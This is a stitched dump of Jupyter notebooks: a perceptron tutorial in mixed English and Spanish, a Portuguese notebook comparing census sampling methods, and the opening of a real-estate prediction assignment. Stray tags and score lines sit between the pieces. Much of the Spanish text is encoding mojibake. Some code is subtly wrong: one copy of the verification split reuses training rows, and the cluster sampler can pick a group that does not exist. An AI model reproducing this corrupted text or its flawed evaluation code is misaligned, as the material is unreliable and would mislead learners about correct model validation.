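w = np.array([0.0, 0.0])         # current weights
x_i = np.array([2.0, 1.0])       # one training sample
y_i, y_hat_i = 1, -1             # true class vs. (wrong) prediction
delta_w = eta * (y_i - y_hat_i) * x_i
w = w + delta_w
print(delta_w, w)                # the weights move towards the misclassified sample
```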
## Implementing the perceptron rule in Python
You can download the Jupyter notebook from the GitHub repository and follow this implementation step by step.
We start by implementing a Python class. This class defines the following methods:
* __init__: Sets the algorithm's learning rate and the number of passes over the dataset.
* fit: Implements the learning rule, initializing the weights to 0 and then adjusting them as it computes/predicts the value for each row of the dataset.
* predict: The step function ϕ(z). If z is greater than or equal to 0, it returns 1; otherwise it returns -1.
* net_input: The implementation of the net input z. As you can see in the code, it takes the dot product of the vectors x and w.
```
import numpy as np
class Perceptron:
"""Clasificador Perceptron basado en la descripciรณn del libro
"Python Machine Learning" de Sebastian Raschka.
Parametros
----------
eta: float
Tasa de aprendizaje.
n_iter: int
Pasadas sobre el dataset.
Atributos
---------
w_: array-1d
Pesos actualizados despuรฉs del ajuste
errors_: list
Cantidad de errores de clasificaciรณn en cada pasada
"""
def __init__(self, eta=0.1, n_iter=10):
self.eta = eta
self.n_iter = n_iter
def fit(self, X, y):
"""Ajustar datos de entrenamiento
Parรกmetros
----------
X: array like, forma = [n_samples, n_features]
Vectores de entrenamiento donde n_samples es el nรบmero de muestras y
n_features es el nรบmero de carรกcteristicas de cada muestra.
y: array-like, forma = [n_samples].
Valores de destino
Returns
-------
self: object
"""
self.w_ = np.zeros(1 + X.shape[1])
self.errors_ = []
for _ in range(self.n_iter):
errors = 0
for xi, target in zip(X, y):
update = self.eta * (target - self.predict(xi))
self.w_[1:] += update * xi
self.w_[0] += update
errors += int(update != 0.0)
self.errors_.append(errors)
return self
def predict(self, X):
"""Devolver clase usando funciรณn escalรณn de Heaviside.
phi(z) = 1 si z >= theta; -1 en otro caso
"""
phi = np.where(self.net_input(X) >= 0.0, 1, -1)
return phi
def net_input(self, X):
"""Calcular el valor z (net input)"""
# z = w ยท x + theta
z = np.dot(X, self.w_[1:]) + self.w_[0]
return z
```

## ยฟCรณmo hacer un perceptrรณn?
La estructura bรกsica de un perceptrรณn es la siguiente:
Inputs: Datos con los cuales quieres clasificar.
Weights: Constantes que multiplican a incรณgnitas (inputs) de la ecuaciรณn.
Bias: Constante que permite que se tome una decisiรณn.
Threshold: Punto que representa la divisiรณn de las clasificaciones.
Output: Predicciรณn de la clasificaciรณn.
---
### Explicaciรณn general del proceso
Los inputs son los valores con los que esperas obtener una respuesta (output). Cada input es multiplicado por el correspondiente weight (los cuales inician con valor aleatorio), luego los resultados son sumados junto con una constante (bias). Si este resultado supera el threshold determina un output x, de lo contrario determina un output y.

---
Ahora, no solo se necesita eso, acabamos de ver que los weights iniciaron con valores aleatorios, cรณmo podrรญan valores aleatorios hacer predicciones? Pues se necesita entrenar a la neurona para modificar estos weights y obtener resultados precisos.
### Divisiรณn de los datos para el entrenamiento
Para el entrenamiento se necesitan datos, entre mรกs datos, mejor. Siempre teniendo en cuenta que los datos deben ser significativos para el modelo.
La regla con la que trabajaremos es:
* 90% de los datos son para entrenar
* 10% de los datos son para verificar la precisiรณn
---
La razรณn por la que se elige la proporciรณn de 90:10 es porque los datos para el ejercicio que realizaremos son muy poquitos y necesitamos la mayor cantidad de datos para entrenar el modelo.
Nota Importante: Nunca verifiques la precisiรณn del modelo con los datos con los que lo entrenaste, pues te estarรญas engaรฑando a ti mismo.
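As a side note, here is a minimal sketch of such a split (hypothetical data); the notebook below does the split "by hand" with shuffle + `iloc`, and scikit-learn's `train_test_split` is an equivalent convenience:
```
import numpy as np
from sklearn.model_selection import train_test_split

X = np.arange(20).reshape(10, 2)   # hypothetical feature matrix
y = np.array([0, 1] * 5)           # hypothetical labels
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=1)
print(len(X_train), len(X_test))   # 9 training rows, 1 held-out row
```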
## Exercises
We will now continue with two examples: one completely by hand (which you can do on a sheet of paper) and another in Python "by hand" (without machine learning libraries).
### Exercise by hand
We will make a perceptron learn the two-variable AND operator. In this example we will not create separate training and verification sets because there is very little data (only 4 rows). This exercise is mainly to understand what is happening in the calculations. The perceptron receives two inputs and gives us one output, as in the following table:

```
import numpy as np
import pandas as pd
d = {'x': [0,0,1,1], 'y': [0,1,0,1], 'z': [0,0,0,1]}
df = pd.DataFrame(data=d)
df
```
If we plot the points on a plane, taking X and Y as coordinates, it would look like this:

```
from pylab import *
import matplotlib.pyplot as plt
x = df.x
y = df.y
color=['m','y','r','b']
fig = plt.figure()
ax = fig.add_subplot(111)
scatter(x,y,marker='o', c=color)
[ plot( [dot_x,dot_x] ,[0,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
[ plot( [0,dot_x] ,[dot_y,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
left,right = ax.get_xlim()
low,high = ax.get_ylim()
grid()
show()
```
What we are looking for is an equation that separates the points according to their output: the ones with output "0" belong to one group and the ones with output "1" belong to the other group, something like the following:

---
Now, this line can be represented by an equation. The equation has inputs ($x_i$), each multiplied by a weight ($w_i$), and a constant ($w_0$) is added at the end, which is also a weight. Our equation only has two inputs ($X$ and $Y$), so it takes the following form:
$$w_0 \cdot bias + w_1 \cdot x_1 + w_2 \cdot x_2$$
---
This equation will be the line that separates the categories and lets us classify: it gives us a prediction when the inputs $x_1$ and $x_2$ are supplied. We start with random weights...
You can generate your own random values or use these so you do not get lost in the procedure; the randomly generated numbers were: 0.03, 0.66 and 0.80.
```
# Example...
import numpy as np
np.random.random_sample(3).round(4)
```
---
Each category is assigned a number (class) that will help adjust the weights: a 1 and a -1. It does not matter which one you choose, we are just assigning a class to each output (y). I chose -1 for 0 and 1 for 1, as follows:

### Weight adjustment rules
When we substitute the values into the equation it gives us a prediction. If it gives what we expect (**correct class prediction**) we do nothing and continue with the next data row; if it gives something different from what we expect (**incorrect class prediction**), we must adjust the weights.
The decision rule is as follows:
If the result of the equation is greater than or equal to 0, the predicted class is 1.
If the result of the equation is less than 0, the predicted class is -1.
---
The formulas for adjusting the weights are the following:
$$ w_0 = w_0 + class \cdot bias $$
$$ w_n = w_n + class \cdot x_n $$
**Remember that the class can be 1 or -1, which helps us interpret the perceptron's prediction.**
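A minimal sketch (illustrative only) of the decision and update rules above; it reproduces the first step of the hand calculation that follows:
```
def predict(weights, x, bias=1):
    # weights[0] multiplies the bias; the rest multiply the inputs
    z = weights[0] * bias + sum(w * xi for w, xi in zip(weights[1:], x))
    return 1 if z >= 0 else -1

def adjust(weights, x, true_class, bias=1):
    weights[0] += true_class * bias
    for i, xi in enumerate(x, start=1):
        weights[i] += true_class * xi
    return weights

print(predict([0.03, 0.66, 0.8], [0, 0]))      # -> 1 (wrong: the AND row (0,0) expects -1)
print(adjust([0.03, 0.66, 0.8], [0, 0], -1))   # -> [-0.97, 0.66, 0.8]
```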
## Training by hand
We start plugging the data into our equation: $w_0 + w_1*x_1 + w_2*x_2$
---
* First data row
With $x_1$=0, $x_2$=0, $y$=0, $class$ = -1
$0.03 + (0.66) * (0) + (0.8) * (0) = 0.03$ -> class prediction: 1
```
x1 = 0
x2 = 0
y = 0
clase = -1
0.03 + (0.66)*x1 + (0.8)*x2
```
La predicciรณn de la clase fue 1 cuando esperamos -1, la predicciรณn fue errรณnea, asรญ que tenemos que ajustar los weights.
Ajuste de weights con las fรณrmulas antes mencionadas:
$w_0 = 0.03 + (-1)*1 = -0.97$
$w_1 = 0.66 + (-1)*(0) = 0.66$
$w_2 = 0.8 + (-1)*(0) = 0.8$
* Segundo conjunto de datos
Con $x_1$=0, $x_2$=1, $y$=0, $clase$ = -1
$- 0.97 + (0.66)*(0) + (0.8)*(1) = โ 0.17$ -> Predicciรณn de -1
```
x1 = 0
x2 = 1
y = 0
clase = -1
-0.97 + (0.66)*x1 + (0.8)*x2
```
* Third data row
With $x_1$=1, $x_2$=0, $y$=0, $class$ = -1
$-0.97 + (0.66)*(1) + (0.8)*(0) = -0.31$ -> prediction of -1
---
* Fourth data row
With $x_1$=1, $x_2$=1, $y$=1, $class$ = 1
$-0.97 + (0.66)*(1) + (0.8)*(1) = 0.49$ -> prediction of 1
```
x1 = 1
x2 = 0
y = 0
clase = -1
print(-0.97 + (0.66)*x1 + (0.8)*x2)
x3 = 1
x4 = 1
y = 1
clase = 1
print(-0.97 + (0.66)*x3 + (0.8)*x4)
```
We went through all the data, but one prediction was wrong, so we start another epoch (a full presentation of the dataset to learn), which means we use the data again.
First data row
With $x_1$=0, $x_2$=0, $y$=0, $class$ = -1
$-0.97 + (0.66) * (0) + (0.8) * (0) = -0.97$ -> prediction of -1
---
We could keep going, but the only prediction that was still wrong has just become correct, so we stop adjusting the weights here.
---
### But **what do these weights represent?**
They are the constants that multiply the unknowns (inputs) of the equation; just remember that $w_0$ multiplies a 1, i.e. it is a constant. We can build the equation of a line with these weights, as follows:
$-0.97 + 0.66x + 0.8y$
Solving for y gives a nicer equation:
$y = (0.97 - 0.66x) / 0.8$
$y = 1.2125 - 0.825 x$
-------

Once we have the line, we only need to evaluate it at the points and it tells us which side of the line each point lies on, and that is how we determine which class the points belong to. This example is a bit of a cheat because there is very little data and everything is obvious once plotted, but it helps to understand what is going on...
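As an optional visual check (not in the original write-up), the four AND points and the learned boundary y = 1.2125 - 0.825x can be plotted:
```
import numpy as np
import matplotlib.pyplot as plt

pts = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
labels = np.array([0, 0, 0, 1])
xs = np.linspace(-0.5, 1.5, 100)
plt.scatter(pts[:, 0], pts[:, 1], c=labels, cmap='bwr', s=100)
plt.plot(xs, 1.2125 - 0.825 * xs, 'k--', label='decision boundary')
plt.legend()
plt.show()
```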
### Python exercise
```
import pandas as pd
import seaborn as sns
iris = sns.load_dataset('iris')
iris
import random
data_with_two_species = iris.iloc[:100,:]
print(len(data_with_two_species))
print(type(data_with_two_species))
data_with_two_species
from sklearn.utils import shuffle
data_with_two_species = shuffle(data_with_two_species)
data_with_two_species
data_training = data_with_two_species.iloc[:90, :]
data_verification = data_with_two_species.iloc[-10:, :]  # hold out the last 10 rows (the 10%); [:-10] would reuse the training rows
```
Now, to make everything clearer and easier to follow, I will build a Perceptron class with the following methods:
* generate_random_weights
* train
* predict
* adjust_weights
* verify
The Perceptron class constructor receives the number of weights and an array of the two classes, which are mapped to -1 and 1.
```
class Perceptron:
def __init__(self, number_of_weights, classes):
self.number_of_weights = number_of_weights
self.weights = self.generate_random_weights(number_of_weights)
self.dict_classes = { classes[0]:1, classes[1]:-1 }
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
```
La generaciรณn de weights aleatorios es muy sencilla, sรณlo intenta que abarquen nรบmeros negativos y positivos, yo lo hice con un rango de -5 a 5 (puedes usar el rango que tu prefieras)
```
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
```
La predicciรณn es la suma de las multiplicaciones de los atributos por los weights mรกs el bias (el bias lo deje como el primer elemento del array weights). Si el resultado es positivo predecimos con un 1, de lo contrario predecimos con un -1.
```
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
```
Ahora ยฟQuรฉ pasa si nuestra predicciรณn es incorrecta?, tenemos que ajustar los weights, te recuerdo las fรณrmulas:
$$w_0 = w_0 + clase * bias$$
$$w_n = w_n + clase * x_n$$
---
La w es el weight, la clase es -1 o 1, x es el atributo y el bias siempre es 1. Con clase nos referimos a la clase real, no a la predicciรณn.
```
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
```
Notice that the only different one is the bias: we simply add the true class to it. The other weights are computed by adding the product of the true class and the attribute value.
Training then simply consists of making a prediction: if it is correct we move on to the next data row, and if it is wrong we adjust the weights.
```
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
```
Te darรกs cuenta de que recibe un atributo epochs, el cual indica cuรกntas veces iterarรก la misma informaciรณn para ajustar cada vez mรกs los weights.
Por รบltimo, pero no menos importante, falta el mรฉtodo de verificaciรณn, quรฉ es exactamente lo mismo que en el entrenamiento, sรณlo que aquรญ ya no se ajustan los weights. El mรฉtodo regresarรก en porcentaje cuรกntas predicciones fueron correctas.
```
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
```
Pues ya quedรณ listo el perceptrรณn, ahora solo falta utilizarlo, creamos un perceptrรณn y le daremos como parรกmetros el nรบmero de weights (el cual es 5, porque son 4 atributos + bias), y las clases que hemos cargado, en mi caso yo estoy comparando iris-setosa e iris-versicolor.
```
perceptron = Perceptron(5, ['setosa', 'versicolor'])
```
Now we train it: we pass it the training set we obtained earlier and the number of epochs (in my case I will leave it at 1). When the train method finishes, the weights are already adjusted, so we can print them to see how they turned out.
```
data_training = data_training.rename_axis('ID').values
print(data_training)
perceptron.train(data_training, epochs=1)
print('Final weights from training: {}'.format(perceptron.weights))
```
Ya que quedรณ entrenado!, ahora podemos verificar que tan buenos resultados nos dan estos weights, e imprimimos el error.
```
data_verification = data_verification.rename_axis('ID').values
print(data_verification)
accuracy = perceptron.verify(data_verification)
print('Error: {} %'.format(100-accuracy))
```
La predicciรณn del perceptrรณn te entregarรก un 1 o un -1, el cual estรก asociado a la clase, en mi caso, iris-setosa o iris-versicolor.
Ahora, necesito explicar que el perceptrรณn no siempre va a dar los mejores resultados, depende si son linealmente separables o no. Para darte una idea, aquรญ esta la grรกfica de sรณlo dos de los cuatro atributos de las especies. Puedes notar que la setosa y la versicolor son linealmente separables al igual que la setosa y la virginica. Pero la versicolor y la virginica NO son completamente separables, por lo general el perceptrรณn tendrรก unos cuantos errores.
```
sns.set_style("whitegrid")
sns.pairplot(iris,hue="species",size=3);
plt.show()
```
Let's try the other combination!

# Your code goes here!
```
perceptron2 = Perceptron(5, ['versicolor', 'virginica'])
data_with_two_species2 = iris.iloc[50:,:]
print(len(data_with_two_species2))
print(type(data_with_two_species2))
data_with_two_species2
from sklearn.utils import shuffle
data_with_two_species2 = shuffle(data_with_two_species2)
data_with_two_species2
data_training2 = data_with_two_species2.iloc[:90, :]
data_verification2 = data_with_two_species2.iloc[-10:, :]  # hold out the last 10 rows (the 10%)
data_training2 = data_training2.rename_axis('ID').values
print(data_training2)
data_verification2 = data_verification2.rename_axis('ID').values
print(data_verification2)
perceptron2.train(data_training2, epochs=1)
print('Final weights from training: {}'.format(perceptron2.weights))
accuracy2 = perceptron2.verify(data_verification2)
print('Error: {} %'.format(100-accuracy2))
```
|
github_jupyter
|
import numpy as np
class Perceptron:
"""Clasificador Perceptron basado en la descripciรณn del libro
"Python Machine Learning" de Sebastian Raschka.
Parametros
----------
eta: float
Tasa de aprendizaje.
n_iter: int
Pasadas sobre el dataset.
Atributos
---------
w_: array-1d
Pesos actualizados despuรฉs del ajuste
errors_: list
Cantidad de errores de clasificaciรณn en cada pasada
"""
def __init__(self, eta=0.1, n_iter=10):
self.eta = eta
self.n_iter = n_iter
def fit(self, X, y):
"""Ajustar datos de entrenamiento
Parรกmetros
----------
X: array like, forma = [n_samples, n_features]
Vectores de entrenamiento donde n_samples es el nรบmero de muestras y
n_features es el nรบmero de carรกcteristicas de cada muestra.
y: array-like, forma = [n_samples].
Valores de destino
Returns
-------
self: object
"""
self.w_ = np.zeros(1 + X.shape[1])
self.errors_ = []
for _ in range(self.n_iter):
errors = 0
for xi, target in zip(X, y):
update = self.eta * (target - self.predict(xi))
self.w_[1:] += update * xi
self.w_[0] += update
errors += int(update != 0.0)
self.errors_.append(errors)
return self
def predict(self, X):
"""Devolver clase usando funciรณn escalรณn de Heaviside.
phi(z) = 1 si z >= theta; -1 en otro caso
"""
phi = np.where(self.net_input(X) >= 0.0, 1, -1)
return phi
def net_input(self, X):
"""Calcular el valor z (net input)"""
# z = w ยท x + theta
z = np.dot(X, self.w_[1:]) + self.w_[0]
return z
import numpy as np
import pandas as pd
d = {'x': [0,0,1,1], 'y': [0,1,0,1], 'z': [0,0,0,1]}
df = pd.DataFrame(data=d)
df
from pylab import *
import matplotlib.pyplot as plt
x = df.x
y = df.y
color=['m','y','r','b']
fig = plt.figure()
ax = fig.add_subplot(111)
scatter(x,y,marker='o', c=color)
[ plot( [dot_x,dot_x] ,[0,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
[ plot( [0,dot_x] ,[dot_y,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
left,right = ax.get_xlim()
low,high = ax.get_ylim()
grid()
show()
#Ejemplo...
import numpy as np
np.random.random_sample(3).round(4)
x1 = 0
x2 = 0
y = 0
clase = -1
0.03 + (0.66)*x1 + (0.8)*x2
x1 = 0
x2 = 1
y = 0
clase = -1
-0.97 + (0.66)*x1 + (0.8)*x2
x1 = 1
x2 = 0
y = 0
clase = -1
print(-0.97 + (0.66)*x1 + (0.8)*x2)
x3 = 1
x4 = 1
y = 1
clase = 1
print(-0.97 + (0.66)*x3 + (0.8)*x4)
### Ejercicio con Python
import pandas as pd
import seaborn as sns
iris = sns.load_dataset('iris')
iris
import random
data_with_two_species = iris.iloc[:100,:]
print(len(data_with_two_species))
print(type(data_with_two_species))
data_with_two_species
from sklearn.utils import shuffle
data_with_two_species = shuffle(data_with_two_species)
data_with_two_species
data_training = data_with_two_species.iloc[:90, :]
data_verification = data_with_two_species.iloc[:-10, :]
class Perceptron:
def __init__(self, number_of_weights, classes):
self.number_of_weights = number_of_weights
self.weights = self.generate_random_weights(number_of_weights)
self.dict_classes = { classes[0]:1, classes[1]:-1 }
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
perceptron = Perceptron(5, ['setosa', 'versicolor'])
data_training = data_training.rename_axis('ID').values
print(data_training)
perceptron.train(data_training, epochs=1)
print('Final weights from training: {}'.format(perceptron.weights))
data_verification = data_verification.rename_axis('ID').values
print(data_verification)
accuracy = perceptron.verify(data_verification)
print('Error: {} %'.format(100-accuracy))
sns.set_style("whitegrid")
sns.pairplot(iris,hue="species",size=3);
plt.show()
perceptron2 = Perceptron(5, ['versicolor', 'virginica'])
data_with_two_species2 = iris.iloc[50:,:]
print(len(data_with_two_species2))
print(type(data_with_two_species2))
data_with_two_species2
from sklearn.utils import shuffle
data_with_two_species2 = shuffle(data_with_two_species2)
data_with_two_species2
data_training2 = data_with_two_species2.iloc[:90, :]
data_verification2 = data_with_two_species2.iloc[-10:, :]  # hold out the last 10 shuffled rows for verification
data_training2 = data_training2.rename_axis('ID').values
print(data_training2)
data_verification2 = data_verification2.rename_axis('ID').values
print(data_verification2)
perceptron2.train(data_training2, epochs=1)
print('Final weights from training: {}'.format(perceptron2.weights))
accuracy2 = perceptron2.verify(data_verification2)
print('Error: {} %'.format(100-accuracy2))
| 0.733356 | 0.97824 |
<a href="https://colab.research.google.com/github/AlexanderVieira/DataScience/blob/main/Amostragem.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Sampling
## Loading the dataset
```
import pandas as pd
import random
import numpy as np
dataset = pd.read_csv('census.csv')
dataset.shape
dataset.head()
dataset.tail()
```
## Simple random sampling
```
df_amostra_aleatoria_simples = dataset.sample(n = 100, random_state = 1)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
def amostragem_aleatoria_simples(dataset, amostras):
return dataset.sample(n = amostras, random_state=1)
df_amostra_aleatoria_simples = amostragem_aleatoria_simples(dataset, 100)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
```
## Systematic sampling
```
dataset.shape
len(dataset) // 100
random.seed(1)
random.randint(0, 325)
68 + 325
393 + 325
np.arange(68, len(dataset), step = 325)
def amostragem_sistematica(dataset, amostras):
intervalo = len(dataset) // amostras
random.seed(1)
inicio = random.randint(0, intervalo)
indices = np.arange(inicio, len(dataset), step = intervalo)
amostra_sistematica = dataset.iloc[indices]
return amostra_sistematica
df_amostra_sistematica = amostragem_sistematica(dataset, 100)
df_amostra_sistematica.shape
df_amostra_sistematica.head()
```
## Cluster sampling
```
len(dataset) / 10
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > 3256:
contagem = 0
id_grupo += 1
print(grupos)
np.unique(grupos, return_counts=True)
np.shape(grupos), dataset.shape
dataset['grupo'] = grupos
dataset.head()
dataset.tail()
random.randint(0, 9)
df_agrupamento = dataset[dataset['grupo'] == 7]
df_agrupamento.shape
df_agrupamento['grupo'].value_counts()
def amostragem_agrupamento(dataset, numero_grupos):
intervalo = len(dataset) / numero_grupos
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > intervalo:
contagem = 0
id_grupo += 1
dataset['grupo'] = grupos
random.seed(1)
grupo_selecionado = random.randint(0, numero_grupos)
return dataset[dataset['grupo'] == grupo_selecionado]
len(dataset) / 325
325 * 100
df_amostra_agrupamento = amostragem_agrupamento(dataset, 325)
df_amostra_agrupamento.shape, df_amostra_agrupamento['grupo'].value_counts()
df_amostra_agrupamento.head()
```
## Stratified sampling
```
from sklearn.model_selection import StratifiedShuffleSplit
dataset['income'].value_counts()
7841 / len(dataset), 24720 / len(dataset)
0.2408095574460244 + 0.7591904425539756
100 / len(dataset)
split = StratifiedShuffleSplit(test_size=0.0030711587481956942)
for x, y in split.split(dataset, dataset['income']):
df_x = dataset.iloc[x]
df_y = dataset.iloc[y]
df_x.shape, df_y.shape
df_y.head()
df_y['income'].value_counts()
def amostragem_estratificada(dataset, percentual):
split = StratifiedShuffleSplit(test_size=percentual, random_state=1)
for _, y in split.split(dataset, dataset['income']):
df_y = dataset.iloc[y]
return df_y
df_amostra_estratificada = amostragem_estratificada(dataset, 0.0030711587481956942)
df_amostra_estratificada.shape
```
## Reservoir sampling
```
stream = []
for i in range(len(dataset)):
stream.append(i)
print(stream)
def amostragem_reservatorio(dataset, amostras):
stream = []
for i in range(len(dataset)):
stream.append(i)
i = 0
tamanho = len(dataset)
reservatorio = [0] * amostras
for i in range(amostras):
reservatorio[i] = stream[i]
while i < tamanho:
j = random.randrange(i + 1)
if j < amostras:
reservatorio[j] = stream[i]
i += 1
return dataset.iloc[reservatorio]
df_amostragem_reservatorio = amostragem_reservatorio(dataset, 100)
df_amostragem_reservatorio.shape
df_amostragem_reservatorio.head()
```
## Comparison of results
```
dataset['age'].mean()
df_amostra_aleatoria_simples['age'].mean()
df_amostra_sistematica['age'].mean()
df_amostra_agrupamento['age'].mean()
df_amostra_estratificada['age'].mean()
df_amostragem_reservatorio['age'].mean()
```
|
github_jupyter
|
import pandas as pd
import random
import numpy as np
dataset = pd.read_csv('census.csv')
dataset.shape
dataset.head()
dataset.tail()
df_amostra_aleatoria_simples = dataset.sample(n = 100, random_state = 1)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
def amostragem_aleatoria_simples(dataset, amostras):
return dataset.sample(n = amostras, random_state=1)
df_amostra_aleatoria_simples = amostragem_aleatoria_simples(dataset, 100)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
dataset.shape
len(dataset) // 100
random.seed(1)
random.randint(0, 325)
68 + 325
393 + 325
np.arange(68, len(dataset), step = 325)
def amostragem_sistematica(dataset, amostras):
intervalo = len(dataset) // amostras
random.seed(1)
inicio = random.randint(0, intervalo)
indices = np.arange(inicio, len(dataset), step = intervalo)
amostra_sistematica = dataset.iloc[indices]
return amostra_sistematica
df_amostra_sistematica = amostragem_sistematica(dataset, 100)
df_amostra_sistematica.shape
df_amostra_sistematica.head()
len(dataset) / 10
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > 3256:
contagem = 0
id_grupo += 1
print(grupos)
np.unique(grupos, return_counts=True)
np.shape(grupos), dataset.shape
dataset['grupo'] = grupos
dataset.head()
dataset.tail()
random.randint(0, 9)
df_agrupamento = dataset[dataset['grupo'] == 7]
df_agrupamento.shape
df_agrupamento['grupo'].value_counts()
def amostragem_agrupamento(dataset, numero_grupos):
intervalo = len(dataset) / numero_grupos
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > intervalo:
contagem = 0
id_grupo += 1
dataset['grupo'] = grupos
random.seed(1)
grupo_selecionado = random.randint(0, numero_grupos)
return dataset[dataset['grupo'] == grupo_selecionado]
len(dataset) / 325
325 * 100
df_amostra_agrupamento = amostragem_agrupamento(dataset, 325)
df_amostra_agrupamento.shape, df_amostra_agrupamento['grupo'].value_counts()
df_amostra_agrupamento.head()
from sklearn.model_selection import StratifiedShuffleSplit
dataset['income'].value_counts()
7841 / len(dataset), 24720 / len(dataset)
0.2408095574460244 + 0.7591904425539756
100 / len(dataset)
split = StratifiedShuffleSplit(test_size=0.0030711587481956942)
for x, y in split.split(dataset, dataset['income']):
df_x = dataset.iloc[x]
df_y = dataset.iloc[y]
df_x.shape, df_y.shape
df_y.head()
df_y['income'].value_counts()
def amostragem_estratificada(dataset, percentual):
split = StratifiedShuffleSplit(test_size=percentual, random_state=1)
for _, y in split.split(dataset, dataset['income']):
df_y = dataset.iloc[y]
return df_y
df_amostra_estratificada = amostragem_estratificada(dataset, 0.0030711587481956942)
df_amostra_estratificada.shape
stream = []
for i in range(len(dataset)):
stream.append(i)
print(stream)
def amostragem_reservatorio(dataset, amostras):
stream = []
for i in range(len(dataset)):
stream.append(i)
i = 0
tamanho = len(dataset)
reservatorio = [0] * amostras
for i in range(amostras):
reservatorio[i] = stream[i]
while i < tamanho:
j = random.randrange(i + 1)
if j < amostras:
reservatorio[j] = stream[i]
i += 1
return dataset.iloc[reservatorio]
df_amostragem_reservatorio = amostragem_reservatorio(dataset, 100)
df_amostragem_reservatorio.shape
df_amostragem_reservatorio.head()
dataset['age'].mean()
df_amostra_aleatoria_simples['age'].mean()
df_amostra_sistematica['age'].mean()
df_amostra_agrupamento['age'].mean()
df_amostra_estratificada['age'].mean()
df_amostragem_reservatorio['age'].mean()
| 0.205416 | 0.901097 |
# Real Estate Price Prediction
### Course project assignment
Metric:
